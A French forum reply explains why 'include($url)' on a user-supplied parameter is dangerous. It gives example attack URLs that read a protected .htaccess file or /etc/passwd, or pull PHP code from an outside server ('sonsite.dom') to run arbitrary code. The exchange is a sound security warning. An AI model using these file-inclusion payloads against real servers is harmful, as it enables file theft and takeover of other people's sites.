Bah oui ça fait un GROS trou
Imagines par exemple que tu protèges un de test répertoires via un fichier .htaccess
Une personne mal intentionnée pourrait tout simplement appeller la page "mapage.php?url=repprotege/.htaccess" pour l'obtenir.
Après lecture de ce fichier il peut obtenir les mots de passe que tu as défini pour le répertoire.
Encore un autre méchant exemple, le type dispose d'un serveur Web et fait simplement "mapage.php?url=http://sonsite.dom/unscript.txt" avec du code PHP dans le fichier texte... à se moment là il peut executer n'importe quel code sur ton serveur et peut par exemple effacer tout ton site si ça lui chante.
Autre exemple (mais la j'ai un doute sur la possibilité, ça dépend des droits d'Apache et/ou des restrictions appliquées au PHP) sous Unix/Linux : "mapage.php?url=/etc/passwd"
-------------------------------
Réponse au message :
-------------------------------
bonjour,
je voudrais savoir si il y a un probleme de securité si je fais un site avec des liens vers des pages en php de la forme "mapage.php?url=pagedemandé.php" sachant que dans mapage.php il y aurai " include($url);"
est-ce qu'il y a alors un probleme de securité et si oui lequel ?
merci d'avance de vos reponses ;-)